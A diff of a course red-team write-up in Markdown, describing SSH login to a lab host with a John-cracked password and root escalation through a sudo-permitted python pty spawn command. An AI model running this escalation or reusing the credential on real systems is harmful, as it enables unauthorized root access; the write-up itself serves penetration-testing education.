skyeskyeskye/PENN_CYBERSECURITY_FINAL/Red_Team_Offensive/Offensive_Summary.md

 Then sign in as steven using ssh and the password cracked by running John:
 `ssh steven@192.168.1.110` and enter the password "pink84"

-Running `sudo -l` as steven shows he doesn't need a password to access python.
+Running `sudo -l` as steven shows the privilege to run python.
 This can be exploited to escalate to root privileges by running:
-`sudo python -c 'import pty;pty.spawn("bin/bash");'`
+`sudo python -c 'import pty;pty.spawn("bin/bash");'` This python code spawns a new bash shell to allow root privileges.

 ![escalatetoroot](https://github.com/skyeskyeskye/PENN_CYBERSECURITY_FINAL/blob/main/Red_Team_Offensive/Images/Escalate_root_redteam_steven_python.jpg)